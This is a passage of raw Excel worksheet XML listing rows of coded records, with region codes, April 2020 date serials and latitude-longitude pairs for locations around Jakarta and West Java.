      <c r="J2056" t="s">
        <v>6874</v>
      </c>
      <c r="L2056" t="s">
        <v>6875</v>
      </c>
      <c r="M2056">
        <v>3175030002</v>
      </c>
      <c r="N2056">
        <v>3175030</v>
      </c>
      <c r="O2056">
        <v>3175</v>
      </c>
      <c r="P2056">
        <v>31</v>
      </c>
      <c r="Q2056" t="s">
        <v>1592</v>
      </c>
      <c r="R2056" t="s">
        <v>1563</v>
      </c>
      <c r="S2056" t="s">
        <v>547</v>
      </c>
      <c r="T2056" t="s">
        <v>33</v>
      </c>
      <c r="U2056" s="5">
        <v>10686695</v>
      </c>
      <c r="V2056" s="5" t="s">
        <v>16279</v>
      </c>
      <c r="W2056" s="5">
        <v>-615621</v>
      </c>
      <c r="X2056" t="s">
        <v>20035</v>
      </c>
      <c r="Y2056" t="str">
        <f t="shared" si="32"/>
        <v>-6.15621,106.86695</v>
      </c>
    </row>
    <row r="2057" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2057">
        <v>181152</v>
      </c>
      <c r="B2057" s="1">
        <v>43931</v>
      </c>
      <c r="C2057">
        <v>0</v>
      </c>
      <c r="D2057" t="s">
        <v>22</v>
      </c>
      <c r="E2057" t="s">
        <v>23</v>
      </c>
      <c r="F2057" t="s">
        <v>6876</v>
      </c>
      <c r="G2057" t="s">
        <v>6877</v>
      </c>
      <c r="H2057" t="s">
        <v>26</v>
      </c>
      <c r="I2057" t="s">
        <v>27</v>
      </c>
      <c r="J2057" t="s">
        <v>4688</v>
      </c>
      <c r="L2057" t="s">
        <v>6878</v>
      </c>
      <c r="M2057">
        <v>3171090001</v>
      </c>
      <c r="N2057">
        <v>3171090</v>
      </c>
      <c r="O2057">
        <v>3171</v>
      </c>
      <c r="P2057">
        <v>31</v>
      </c>
      <c r="Q2057" t="s">
        <v>6003</v>
      </c>
      <c r="R2057" t="s">
        <v>347</v>
      </c>
      <c r="S2057" t="s">
        <v>108</v>
      </c>
      <c r="T2057" t="s">
        <v>33</v>
      </c>
      <c r="U2057" s="5">
        <v>10683700</v>
      </c>
      <c r="V2057" s="5" t="s">
        <v>16280</v>
      </c>
      <c r="W2057" s="5">
        <v>-624139</v>
      </c>
      <c r="X2057" t="s">
        <v>20036</v>
      </c>
      <c r="Y2057" t="str">
        <f t="shared" si="32"/>
        <v>-6.24139,106.83700</v>
      </c>
    </row>
    <row r="2058" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2058">
        <v>181153</v>
      </c>
      <c r="B2058" s="1">
        <v>43931</v>
      </c>
      <c r="C2058">
        <v>0</v>
      </c>
      <c r="D2058" t="s">
        <v>2648</v>
      </c>
      <c r="E2058" t="s">
        <v>23</v>
      </c>
      <c r="G2058" t="s">
        <v>6879</v>
      </c>
      <c r="H2058" t="s">
        <v>26</v>
      </c>
      <c r="J2058" t="s">
        <v>6880</v>
      </c>
      <c r="L2058" t="s">
        <v>6881</v>
      </c>
      <c r="M2058">
        <v>3172010004</v>
      </c>
      <c r="N2058">
        <v>3172010</v>
      </c>
      <c r="O2058">
        <v>3172</v>
      </c>
      <c r="P2058">
        <v>31</v>
      </c>
      <c r="Q2058" t="s">
        <v>6882</v>
      </c>
      <c r="R2058" t="s">
        <v>5562</v>
      </c>
      <c r="S2058" t="s">
        <v>49</v>
      </c>
      <c r="T2058" t="s">
        <v>33</v>
      </c>
      <c r="U2058" s="5">
        <v>10685574</v>
      </c>
      <c r="V2058" s="5" t="s">
        <v>16281</v>
      </c>
      <c r="W2058" s="5">
        <v>-632115</v>
      </c>
      <c r="X2058" t="s">
        <v>20037</v>
      </c>
      <c r="Y2058" t="str">
        <f t="shared" si="32"/>
        <v>-6.32115,106.85574</v>
      </c>
    </row>
    <row r="2059" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2059">
        <v>181158</v>
      </c>
      <c r="B2059" s="1">
        <v>43931</v>
      </c>
      <c r="C2059">
        <v>0</v>
      </c>
      <c r="D2059" t="s">
        <v>2648</v>
      </c>
      <c r="E2059" t="s">
        <v>23</v>
      </c>
      <c r="G2059" t="s">
        <v>6883</v>
      </c>
      <c r="H2059" t="s">
        <v>26</v>
      </c>
      <c r="J2059" t="s">
        <v>5747</v>
      </c>
      <c r="L2059" t="s">
        <v>6884</v>
      </c>
      <c r="M2059">
        <v>3172050002</v>
      </c>
      <c r="N2059">
        <v>3172050</v>
      </c>
      <c r="O2059">
        <v>3172</v>
      </c>
      <c r="P2059">
        <v>31</v>
      </c>
      <c r="Q2059" t="s">
        <v>5749</v>
      </c>
      <c r="R2059" t="s">
        <v>358</v>
      </c>
      <c r="S2059" t="s">
        <v>49</v>
      </c>
      <c r="T2059" t="s">
        <v>33</v>
      </c>
      <c r="U2059" s="5">
        <v>10685778</v>
      </c>
      <c r="V2059" s="5" t="s">
        <v>16282</v>
      </c>
      <c r="W2059" s="5">
        <v>-629061</v>
      </c>
      <c r="X2059" t="s">
        <v>20038</v>
      </c>
      <c r="Y2059" t="str">
        <f t="shared" si="32"/>
        <v>-6.29061,106.85778</v>
      </c>
    </row>
    <row r="2060" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2060">
        <v>181160</v>
      </c>
      <c r="B2060" s="1">
        <v>43931</v>
      </c>
      <c r="C2060">
        <v>0</v>
      </c>
      <c r="D2060" t="s">
        <v>2648</v>
      </c>
      <c r="E2060" t="s">
        <v>23</v>
      </c>
      <c r="G2060" t="s">
        <v>6885</v>
      </c>
      <c r="H2060" t="s">
        <v>26</v>
      </c>
      <c r="J2060" t="s">
        <v>6886</v>
      </c>
      <c r="L2060" t="s">
        <v>6887</v>
      </c>
      <c r="M2060">
        <v>3171010006</v>
      </c>
      <c r="N2060">
        <v>3171010</v>
      </c>
      <c r="O2060">
        <v>3171</v>
      </c>
      <c r="P2060">
        <v>31</v>
      </c>
      <c r="Q2060" t="s">
        <v>6888</v>
      </c>
      <c r="R2060" t="s">
        <v>264</v>
      </c>
      <c r="S2060" t="s">
        <v>108</v>
      </c>
      <c r="T2060" t="s">
        <v>33</v>
      </c>
      <c r="U2060" s="5">
        <v>10684971</v>
      </c>
      <c r="V2060" s="5" t="s">
        <v>16283</v>
      </c>
      <c r="W2060" s="5">
        <v>-631288</v>
      </c>
      <c r="X2060" t="s">
        <v>20039</v>
      </c>
      <c r="Y2060" t="str">
        <f t="shared" si="32"/>
        <v>-6.31288,106.84971</v>
      </c>
    </row>
    <row r="2061" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2061">
        <v>182025</v>
      </c>
      <c r="B2061" s="1">
        <v>43933</v>
      </c>
      <c r="C2061">
        <v>1</v>
      </c>
      <c r="D2061" t="s">
        <v>22</v>
      </c>
      <c r="E2061" t="s">
        <v>23</v>
      </c>
      <c r="F2061" t="s">
        <v>6889</v>
      </c>
      <c r="G2061" t="s">
        <v>6890</v>
      </c>
      <c r="H2061" t="s">
        <v>26</v>
      </c>
      <c r="I2061" t="s">
        <v>1909</v>
      </c>
      <c r="J2061" t="s">
        <v>2627</v>
      </c>
      <c r="L2061" t="s">
        <v>6891</v>
      </c>
      <c r="M2061">
        <v>3275010009</v>
      </c>
      <c r="N2061">
        <v>3275010</v>
      </c>
      <c r="O2061">
        <v>3275</v>
      </c>
      <c r="P2061">
        <v>32</v>
      </c>
      <c r="Q2061" t="s">
        <v>2444</v>
      </c>
      <c r="R2061" t="s">
        <v>287</v>
      </c>
      <c r="S2061" t="s">
        <v>41</v>
      </c>
      <c r="T2061" t="s">
        <v>42</v>
      </c>
      <c r="U2061" s="5">
        <v>10691829</v>
      </c>
      <c r="V2061" s="5" t="s">
        <v>16284</v>
      </c>
      <c r="W2061" s="5">
        <v>-627487</v>
      </c>
      <c r="X2061" t="s">
        <v>20040</v>
      </c>
      <c r="Y2061" t="str">
        <f t="shared" si="32"/>
        <v>-6.27487,106.91829</v>
      </c>
    </row>
    <row r="2062" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2062">
        <v>182026</v>
      </c>
      <c r="B2062" s="1">
        <v>43933</v>
      </c>
      <c r="C2062">
        <v>1</v>
      </c>
      <c r="D2062" t="s">
        <v>22</v>
      </c>
      <c r="E2062" t="s">
        <v>23</v>
      </c>
      <c r="F2062" t="s">
        <v>6892</v>
      </c>
      <c r="G2062" t="s">
        <v>6893</v>
      </c>
      <c r="H2062" t="s">
        <v>26</v>
      </c>
      <c r="I2062" t="s">
        <v>661</v>
      </c>
      <c r="J2062" t="s">
        <v>2536</v>
      </c>
      <c r="M2062">
        <v>3172040005</v>
      </c>
      <c r="N2062">
        <v>3172040</v>
      </c>
      <c r="O2062">
        <v>3172</v>
      </c>
      <c r="P2062">
        <v>31</v>
      </c>
      <c r="Q2062" t="s">
        <v>1351</v>
      </c>
      <c r="R2062" t="s">
        <v>281</v>
      </c>
      <c r="S2062" t="s">
        <v>49</v>
      </c>
      <c r="T2062" t="s">
        <v>33</v>
      </c>
      <c r="U2062" s="5">
        <v>10690139</v>
      </c>
      <c r="V2062" s="5" t="s">
        <v>16285</v>
      </c>
      <c r="W2062" s="5">
        <v>-624626</v>
      </c>
      <c r="X2062" t="s">
        <v>20041</v>
      </c>
      <c r="Y2062" t="str">
        <f t="shared" si="32"/>
        <v>-6.24626,106.90139</v>
      </c>
    </row>
    <row r="2063" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2063">
        <v>182027</v>
      </c>
      <c r="B2063" s="1">
        <v>43933</v>
      </c>
      <c r="C2063">
        <v>1</v>
      </c>
      <c r="D2063" t="s">
        <v>2648</v>
      </c>
      <c r="E2063" t="s">
        <v>23</v>
      </c>
      <c r="G2063" t="s">
        <v>6894</v>
      </c>
      <c r="H2063" t="s">
        <v>26</v>
      </c>
      <c r="J2063" t="s">
        <v>6895</v>
      </c>
      <c r="L2063" t="s">
        <v>6896</v>
      </c>
      <c r="M2063">
        <v>3172070003</v>
      </c>
      <c r="N2063">
        <v>3172070</v>
      </c>
      <c r="O2063">
        <v>3172</v>
      </c>
      <c r="P2063">
        <v>31</v>
      </c>
      <c r="Q2063" t="s">
        <v>2659</v>
      </c>
      <c r="R2063" t="s">
        <v>128</v>
      </c>
      <c r="S2063" t="s">
        <v>49</v>
      </c>
      <c r="T2063" t="s">
        <v>33</v>
      </c>
      <c r="U2063" s="5">
        <v>10692599</v>
      </c>
      <c r="V2063" s="5" t="s">
        <v>16286</v>
      </c>
      <c r="W2063" s="5">
        <v>-624194</v>
      </c>
      <c r="X2063" t="s">
        <v>20042</v>
      </c>
      <c r="Y2063" t="str">
        <f t="shared" si="32"/>
        <v>-6.24194,106.92599</v>
      </c>
    </row>
    <row r="2064" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2064">
        <v>182030</v>
      </c>
      <c r="B2064" s="1">
        <v>43933</v>
      </c>
      <c r="C2064">
        <v>1</v>
      </c>
      <c r="D2064" t="s">
        <v>2648</v>
      </c>
      <c r="E2064" t="s">
        <v>23</v>
      </c>
      <c r="G2064" t="s">
        <v>6897</v>
      </c>
      <c r="H2064" t="s">
        <v>26</v>
      </c>
      <c r="J2064" t="s">
        <v>2580</v>
      </c>
      <c r="L2064" t="s">
        <v>6898</v>
      </c>
      <c r="M2064">
        <v>3172040005</v>
      </c>
      <c r="N2064">
        <v>3172040</v>
      </c>
      <c r="O2064">
        <v>3172</v>
      </c>
      <c r="P2064">
        <v>31</v>
      </c>
      <c r="Q2064" t="s">
        <v>1351</v>
      </c>
      <c r="R2064" t="s">
        <v>281</v>
      </c>
      <c r="S2064" t="s">
        <v>49</v>
      </c>
      <c r="T2064" t="s">
        <v>33</v>
      </c>
      <c r="U2064" s="5">
        <v>10689378</v>
      </c>
      <c r="V2064" s="5" t="s">
        <v>16273</v>
      </c>
      <c r="W2064" s="5">
        <v>-624112</v>
      </c>
      <c r="X2064" t="s">
        <v>18920</v>
      </c>
      <c r="Y2064" t="str">
        <f t="shared" si="32"/>
        <v>-6.24112,106.89378</v>
      </c>
    </row>
    <row r="2065" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2065">
        <v>182034</v>
      </c>
      <c r="B2065" s="1">
        <v>43933</v>
      </c>
      <c r="C2065">
        <v>1</v>
      </c>
      <c r="D2065" t="s">
        <v>2648</v>
      </c>
      <c r="E2065" t="s">
        <v>23</v>
      </c>
      <c r="G2065" t="s">
        <v>6899</v>
      </c>
      <c r="H2065" t="s">
        <v>26</v>
      </c>
      <c r="J2065" t="s">
        <v>6895</v>
      </c>
      <c r="L2065" t="s">
        <v>6900</v>
      </c>
      <c r="M2065">
        <v>3172070003</v>
      </c>
      <c r="N2065">
        <v>3172070</v>
      </c>
      <c r="O2065">
        <v>3172</v>
      </c>
      <c r="P2065">
        <v>31</v>
      </c>
      <c r="Q2065" t="s">
        <v>2659</v>
      </c>
      <c r="R2065" t="s">
        <v>128</v>
      </c>
      <c r="S2065" t="s">
        <v>49</v>
      </c>
      <c r="T2065" t="s">
        <v>33</v>
      </c>
      <c r="U2065" s="5">
        <v>10692596</v>
      </c>
      <c r="V2065" s="5" t="s">
        <v>16287</v>
      </c>
      <c r="W2065" s="5">
        <v>-624210</v>
      </c>
      <c r="X2065" t="s">
        <v>20043</v>
      </c>
      <c r="Y2065" t="str">
        <f t="shared" si="32"/>
        <v>-6.24210,106.92596</v>
      </c>
    </row>
    <row r="2066" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2066">
        <v>182798</v>
      </c>
      <c r="B2066" s="1">
        <v>43934</v>
      </c>
      <c r="C2066">
        <v>0</v>
      </c>
      <c r="D2066" t="s">
        <v>2648</v>
      </c>
      <c r="E2066" t="s">
        <v>23</v>
      </c>
      <c r="G2066" t="s">
        <v>6901</v>
      </c>
      <c r="H2066" t="s">
        <v>26</v>
      </c>
      <c r="J2066" t="s">
        <v>6902</v>
      </c>
      <c r="L2066" t="s">
        <v>6903</v>
      </c>
      <c r="M2066">
        <v>3174060003</v>
      </c>
      <c r="N2066">
        <v>3174060</v>
      </c>
      <c r="O2066">
        <v>3174</v>
      </c>
      <c r="P2066">
        <v>31</v>
      </c>
      <c r="Q2066" t="s">
        <v>1762</v>
      </c>
      <c r="R2066" t="s">
        <v>1762</v>
      </c>
      <c r="S2066" t="s">
        <v>32</v>
      </c>
      <c r="T2066" t="s">
        <v>33</v>
      </c>
      <c r="U2066" s="5">
        <v>10682696</v>
      </c>
      <c r="V2066" s="5" t="s">
        <v>16006</v>
      </c>
      <c r="W2066" s="5">
        <v>-615060</v>
      </c>
      <c r="X2066" t="s">
        <v>20044</v>
      </c>
      <c r="Y2066" t="str">
        <f t="shared" si="32"/>
        <v>-6.15060,106.82696</v>
      </c>
    </row>
    <row r="2067" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2067">
        <v>182832</v>
      </c>
      <c r="B2067" s="1">
        <v>43934</v>
      </c>
      <c r="C2067">
        <v>1</v>
      </c>
      <c r="D2067" t="s">
        <v>22</v>
      </c>
      <c r="E2067" t="s">
        <v>23</v>
      </c>
      <c r="F2067" t="s">
        <v>6904</v>
      </c>
      <c r="G2067" t="s">
        <v>6905</v>
      </c>
      <c r="H2067" t="s">
        <v>26</v>
      </c>
      <c r="I2067" t="s">
        <v>2300</v>
      </c>
      <c r="J2067" t="s">
        <v>4282</v>
      </c>
      <c r="M2067">
        <v>3171070005</v>
      </c>
      <c r="N2067">
        <v>3171070</v>
      </c>
      <c r="O2067">
        <v>3171</v>
      </c>
      <c r="P2067">
        <v>31</v>
      </c>
      <c r="Q2067" t="s">
        <v>218</v>
      </c>
      <c r="R2067" t="s">
        <v>121</v>
      </c>
      <c r="S2067" t="s">
        <v>108</v>
      </c>
      <c r="T2067" t="s">
        <v>33</v>
      </c>
      <c r="U2067" s="5">
        <v>10681764</v>
      </c>
      <c r="V2067" s="5" t="s">
        <v>16288</v>
      </c>
      <c r="W2067" s="5">
        <v>-623374</v>
      </c>
      <c r="X2067" t="s">
        <v>20045</v>
      </c>
      <c r="Y2067" t="str">
        <f t="shared" si="32"/>
        <v>-6.23374,106.81764</v>
      </c>
    </row>
    <row r="2068" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2068">
        <v>182869</v>
      </c>
      <c r="B2068" s="1">
        <v>43934</v>
      </c>
      <c r="C2068">
        <v>1</v>
      </c>
      <c r="D2068" t="s">
        <v>2648</v>
      </c>
      <c r="E2068" t="s">
        <v>23</v>
      </c>
      <c r="G2068" t="s">
        <v>6906</v>
      </c>
      <c r="H2068" t="s">
        <v>26</v>
      </c>
      <c r="J2068" t="s">
        <v>6902</v>
      </c>
      <c r="L2068" t="s">
        <v>6907</v>
      </c>
      <c r="M2068">
        <v>3174060003</v>
      </c>
      <c r="N2068">
        <v>3174060</v>
      </c>
      <c r="O2068">
        <v>3174</v>
      </c>
      <c r="P2068">
        <v>31</v>
      </c>
      <c r="Q2068" t="s">
        <v>1762</v>
      </c>
      <c r="R2068" t="s">
        <v>1762</v>
      </c>
      <c r="S2068" t="s">
        <v>32</v>
      </c>
      <c r="T2068" t="s">
        <v>33</v>
      </c>
      <c r="U2068" s="5">
        <v>10682699</v>
      </c>
      <c r="V2068" s="5" t="s">
        <v>16289</v>
      </c>
      <c r="W2068" s="5">
        <v>-615044</v>
      </c>
      <c r="X2068" t="s">
        <v>20046</v>
      </c>
      <c r="Y2068" t="str">
        <f t="shared" si="32"/>
        <v>-6.15044,106.82699</v>
      </c>
    </row>
    <row r="2069" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2069">
        <v>182906</v>
      </c>
      <c r="B2069" s="1">
        <v>43934</v>
      </c>
      <c r="C2069">
        <v>1</v>
      </c>
      <c r="D2069" t="s">
        <v>2648</v>
      </c>
      <c r="E2069" t="s">
        <v>23</v>
      </c>
      <c r="G2069" t="s">
        <v>6908</v>
      </c>
      <c r="H2069" t="s">
        <v>26</v>
      </c>
      <c r="J2069" t="s">
        <v>6537</v>
      </c>
      <c r="L2069" t="s">
        <v>6909</v>
      </c>
      <c r="M2069">
        <v>3172080005</v>
      </c>
      <c r="N2069">
        <v>3172080</v>
      </c>
      <c r="O2069">
        <v>3172</v>
      </c>
      <c r="P2069">
        <v>31</v>
      </c>
      <c r="Q2069" t="s">
        <v>140</v>
      </c>
      <c r="R2069" t="s">
        <v>141</v>
      </c>
      <c r="S2069" t="s">
        <v>49</v>
      </c>
      <c r="T2069" t="s">
        <v>33</v>
      </c>
      <c r="U2069" s="5">
        <v>10694807</v>
      </c>
      <c r="V2069" s="5" t="s">
        <v>16290</v>
      </c>
      <c r="W2069" s="5">
        <v>-617312</v>
      </c>
      <c r="X2069" t="s">
        <v>20047</v>
      </c>
      <c r="Y2069" t="str">
        <f t="shared" si="32"/>
        <v>-6.17312,106.94807</v>
      </c>
    </row>
    <row r="2070" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2070">
        <v>183103</v>
      </c>
      <c r="B2070" s="1">
        <v>43934</v>
      </c>
      <c r="C2070">
        <v>1</v>
      </c>
      <c r="D2070" t="s">
        <v>2648</v>
      </c>
      <c r="E2070" t="s">
        <v>23</v>
      </c>
      <c r="G2070" t="s">
        <v>6910</v>
      </c>
      <c r="H2070" t="s">
        <v>26</v>
      </c>
      <c r="J2070" t="s">
        <v>530</v>
      </c>
      <c r="L2070" t="s">
        <v>6911</v>
      </c>
      <c r="M2070">
        <v>3174020006</v>
      </c>
      <c r="N2070">
        <v>3174020</v>
      </c>
      <c r="O2070">
        <v>3174</v>
      </c>
      <c r="P2070">
        <v>31</v>
      </c>
      <c r="Q2070" t="s">
        <v>427</v>
      </c>
      <c r="R2070" t="s">
        <v>31</v>
      </c>
      <c r="S2070" t="s">
        <v>32</v>
      </c>
      <c r="T2070" t="s">
        <v>33</v>
      </c>
      <c r="U2070" s="5">
        <v>10675729</v>
      </c>
      <c r="V2070" s="5" t="s">
        <v>16291</v>
      </c>
      <c r="W2070" s="5">
        <v>-618683</v>
      </c>
      <c r="X2070" t="s">
        <v>20048</v>
      </c>
      <c r="Y2070" t="str">
        <f t="shared" si="32"/>
        <v>-6.18683,106.75729</v>
      </c>
    </row>
    <row r="2071" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2071">
        <v>184032</v>
      </c>
      <c r="B2071" s="1">
        <v>43935</v>
      </c>
      <c r="C2071">
        <v>1</v>
      </c>
      <c r="D2071" t="s">
        <v>2648</v>
      </c>
      <c r="E2071" t="s">
        <v>23</v>
      </c>
      <c r="G2071" t="s">
        <v>6912</v>
      </c>
      <c r="H2071" t="s">
        <v>26</v>
      </c>
      <c r="J2071" t="s">
        <v>1715</v>
      </c>
      <c r="L2071" t="s">
        <v>6913</v>
      </c>
      <c r="M2071">
        <v>3175010005</v>
      </c>
      <c r="N2071">
        <v>3175010</v>
      </c>
      <c r="O2071">
        <v>3175</v>
      </c>
      <c r="P2071">
        <v>31</v>
      </c>
      <c r="Q2071" t="s">
        <v>1686</v>
      </c>
      <c r="R2071" t="s">
        <v>546</v>
      </c>
      <c r="S2071" t="s">
        <v>547</v>
      </c>
      <c r="T2071" t="s">
        <v>33</v>
      </c>
      <c r="U2071" s="5">
        <v>10676889</v>
      </c>
      <c r="V2071" s="5" t="s">
        <v>16292</v>
      </c>
      <c r="W2071" s="5">
        <v>-610768</v>
      </c>
      <c r="X2071" t="s">
        <v>20049</v>
      </c>
      <c r="Y2071" t="str">
        <f t="shared" si="32"/>
        <v>-6.10768,106.76889</v>
      </c>
    </row>
    <row r="2072" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2072">
        <v>184254</v>
      </c>
      <c r="B2072" s="1">
        <v>43936</v>
      </c>
      <c r="C2072">
        <v>0</v>
      </c>
      <c r="D2072" t="s">
        <v>2648</v>
      </c>
      <c r="E2072" t="s">
        <v>23</v>
      </c>
      <c r="G2072" t="s">
        <v>6914</v>
      </c>
      <c r="H2072" t="s">
        <v>26</v>
      </c>
      <c r="J2072" t="s">
        <v>1715</v>
      </c>
      <c r="L2072" t="s">
        <v>6915</v>
      </c>
      <c r="M2072">
        <v>3175010005</v>
      </c>
      <c r="N2072">
        <v>3175010</v>
      </c>
      <c r="O2072">
        <v>3175</v>
      </c>
      <c r="P2072">
        <v>31</v>
      </c>
      <c r="Q2072" t="s">
        <v>1686</v>
      </c>
      <c r="R2072" t="s">
        <v>546</v>
      </c>
      <c r="S2072" t="s">
        <v>547</v>
      </c>
      <c r="T2072" t="s">
        <v>33</v>
      </c>
      <c r="U2072" s="5">
        <v>10677123</v>
      </c>
      <c r="V2072" s="5" t="s">
        <v>16293</v>
      </c>
      <c r="W2072" s="5">
        <v>-611111</v>
      </c>
      <c r="X2072" t="s">
        <v>20050</v>
      </c>
      <c r="Y2072" t="str">
        <f t="shared" si="32"/>
        <v>-6.11111,106.77123</v>
      </c>
    </row>
    <row r="2073" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2073">
        <v>184293</v>
      </c>
      <c r="B2073" s="1">
        <v>43936</v>
      </c>
      <c r="C2073">
        <v>0</v>
      </c>
      <c r="D2073" t="s">
        <v>2648</v>
      </c>
      <c r="E2073" t="s">
        <v>23</v>
      </c>
      <c r="G2073" t="s">
        <v>6916</v>
      </c>
      <c r="H2073" t="s">
        <v>26</v>
      </c>
      <c r="J2073" t="s">
        <v>6917</v>
      </c>
      <c r="L2073" t="s">
        <v>6918</v>
      </c>
      <c r="M2073">
        <v>3172080003</v>
      </c>
      <c r="N2073">
        <v>3172080</v>
      </c>
      <c r="O2073">
        <v>3172</v>
      </c>
      <c r="P2073">
        <v>31</v>
      </c>
      <c r="Q2073" t="s">
        <v>2250</v>
      </c>
      <c r="R2073" t="s">
        <v>141</v>
      </c>
      <c r="S2073" t="s">
        <v>49</v>
      </c>
      <c r="T2073" t="s">
        <v>33</v>
      </c>
      <c r="U2073" s="5">
        <v>10695968</v>
      </c>
      <c r="V2073" s="5" t="s">
        <v>16294</v>
      </c>
      <c r="W2073" s="5">
        <v>-620993</v>
      </c>
      <c r="X2073" t="s">
        <v>20051</v>
      </c>
      <c r="Y2073" t="str">
        <f t="shared" si="32"/>
        <v>-6.20993,106.95968</v>
      </c>
    </row>
    <row r="2074" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2074">
        <v>184364</v>
      </c>
      <c r="B2074" s="1">
        <v>43936</v>
      </c>
      <c r="C2074">
        <v>1</v>
      </c>
      <c r="D2074" t="s">
        <v>85</v>
      </c>
      <c r="E2074" t="s">
        <v>23</v>
      </c>
      <c r="F2074" t="s">
        <v>6919</v>
      </c>
      <c r="G2074" t="s">
        <v>6920</v>
      </c>
      <c r="H2074" t="s">
        <v>26</v>
      </c>
      <c r="J2074" t="s">
        <v>2627</v>
      </c>
      <c r="K2074" t="s">
        <v>6921</v>
      </c>
      <c r="L2074" t="s">
        <v>6922</v>
      </c>
      <c r="M2074">
        <v>3216081006</v>
      </c>
      <c r="N2074">
        <v>3216081</v>
      </c>
      <c r="O2074">
        <v>3216</v>
      </c>
      <c r="P2074">
        <v>32</v>
      </c>
      <c r="Q2074" t="s">
        <v>2511</v>
      </c>
      <c r="R2074" t="s">
        <v>2512</v>
      </c>
      <c r="S2074" t="s">
        <v>41</v>
      </c>
      <c r="T2074" t="s">
        <v>42</v>
      </c>
      <c r="U2074" s="5">
        <v>10703740</v>
      </c>
      <c r="V2074" s="5" t="s">
        <v>16295</v>
      </c>
      <c r="W2074" s="5">
        <v>-625024</v>
      </c>
      <c r="X2074" t="s">
        <v>20052</v>
      </c>
      <c r="Y2074" t="str">
        <f t="shared" si="32"/>
        <v>-6.25024,107.03740</v>
      </c>
    </row>
    <row r="2075" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2075">
        <v>184714</v>
      </c>
      <c r="B2075" s="1">
        <v>43938</v>
      </c>
      <c r="C2075">
        <v>1</v>
      </c>
      <c r="D2075" t="s">
        <v>22</v>
      </c>
      <c r="E2075" t="s">
        <v>23</v>
      </c>
      <c r="F2075" t="s">
        <v>6923</v>
      </c>
      <c r="G2075" t="s">
        <v>6924</v>
      </c>
      <c r="H2075" t="s">
        <v>26</v>
      </c>
      <c r="I2075" t="s">
        <v>166</v>
      </c>
      <c r="J2075" t="s">
        <v>2627</v>
      </c>
      <c r="L2075" t="s">
        <v>6925</v>
      </c>
      <c r="M2075">
        <v>3201221006</v>
      </c>
      <c r="N2075">
        <v>3201221</v>
      </c>
      <c r="O2075">
        <v>3201</v>
      </c>
      <c r="P2075">
        <v>32</v>
      </c>
      <c r="Q2075" t="s">
        <v>6926</v>
      </c>
      <c r="R2075" t="s">
        <v>6927</v>
      </c>
      <c r="S2075" t="s">
        <v>421</v>
      </c>
      <c r="T2075" t="s">
        <v>42</v>
      </c>
      <c r="U2075" s="5">
        <v>10673625</v>
      </c>
      <c r="V2075" s="5" t="s">
        <v>16296</v>
      </c>
      <c r="W2075" s="5">
        <v>-645723</v>
      </c>
      <c r="X2075" t="s">
        <v>20053</v>
      </c>
      <c r="Y2075" t="str">
        <f t="shared" si="32"/>
        <v>-6.45723,106.73625</v>
      </c>
    </row>
    <row r="2076" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2076">
        <v>184715</v>
      </c>
      <c r="B2076" s="1">
        <v>43938</v>
      </c>
      <c r="C2076">
        <v>1</v>
      </c>
      <c r="D2076" t="s">
        <v>22</v>
      </c>
      <c r="E2076" t="s">
        <v>23</v>
      </c>
      <c r="F2076" t="s">
        <v>6928</v>
      </c>
      <c r="G2076" t="s">
        <v>6929</v>
      </c>
      <c r="H2076" t="s">
        <v>26</v>
      </c>
      <c r="I2076" t="s">
        <v>166</v>
      </c>
      <c r="J2076" t="s">
        <v>2627</v>
      </c>
      <c r="L2076" t="s">
        <v>6930</v>
      </c>
      <c r="M2076">
        <v>3201221006</v>
      </c>
      <c r="N2076">
        <v>3201221</v>
      </c>
      <c r="O2076">
        <v>3201</v>
      </c>
      <c r="P2076">
        <v>32</v>
      </c>
      <c r="Q2076" t="s">
        <v>6926</v>
      </c>
      <c r="R2076" t="s">
        <v>6927</v>
      </c>
      <c r="S2076" t="s">
        <v>421</v>
      </c>
      <c r="T2076" t="s">
        <v>42</v>
      </c>
      <c r="U2076" s="5">
        <v>10673645</v>
      </c>
      <c r="V2076" s="5" t="s">
        <v>16297</v>
      </c>
      <c r="W2076" s="5">
        <v>-645709</v>
      </c>
      <c r="X2076" t="s">
        <v>20054</v>
      </c>
      <c r="Y2076" t="str">
        <f t="shared" si="32"/>
        <v>-6.45709,106.73645</v>
      </c>
    </row>
    <row r="2077" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2077">
        <v>184716</v>
      </c>
      <c r="B2077" s="1">
        <v>43938</v>
      </c>
      <c r="C2077">
        <v>1</v>
      </c>
      <c r="D2077" t="s">
        <v>22</v>
      </c>
      <c r="E2077" t="s">
        <v>23</v>
      </c>
      <c r="F2077" t="s">
        <v>6931</v>
      </c>
      <c r="G2077" t="s">
        <v>6932</v>
      </c>
      <c r="H2077" t="s">
        <v>26</v>
      </c>
      <c r="I2077" t="s">
        <v>6933</v>
      </c>
      <c r="J2077" t="s">
        <v>2627</v>
      </c>
      <c r="L2077" t="s">
        <v>6934</v>
      </c>
      <c r="M2077">
        <v>3276011002</v>
      </c>
      <c r="N2077">
        <v>3276011</v>
      </c>
      <c r="O2077">
        <v>3276</v>
      </c>
      <c r="P2077">
        <v>32</v>
      </c>
      <c r="Q2077" t="s">
        <v>6641</v>
      </c>
      <c r="R2077" t="s">
        <v>6642</v>
      </c>
      <c r="S2077" t="s">
        <v>185</v>
      </c>
      <c r="T2077" t="s">
        <v>42</v>
      </c>
      <c r="U2077" s="5">
        <v>10673692</v>
      </c>
      <c r="V2077" s="5" t="s">
        <v>16298</v>
      </c>
      <c r="W2077" s="5">
        <v>-642250</v>
      </c>
      <c r="X2077" t="s">
